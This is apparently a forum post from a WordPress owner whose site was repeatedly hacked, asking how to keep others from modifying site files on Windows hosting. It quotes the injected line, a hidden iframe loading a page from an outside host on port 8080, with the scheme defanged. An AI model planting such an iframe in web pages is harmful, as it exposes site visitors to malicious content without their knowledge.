Recently my wordpress has been loaded with malicious codes. The code below is the culprit and its injected into most of the files as last line, including index.php in root and all folders.
<iframe src="xttp://jumbobestrate.cn:8080/index.php" width=195 height=158 style="visibility: hidden"></iframe>
I re-installed WP and again got hacked. My site is a hosted on windows hosting and so its tedious to set permissions to files and folders. I want to know how to prevent others from modifying my site files? Please help me. I suffered a lot with this and mys site is losing rank and credibility.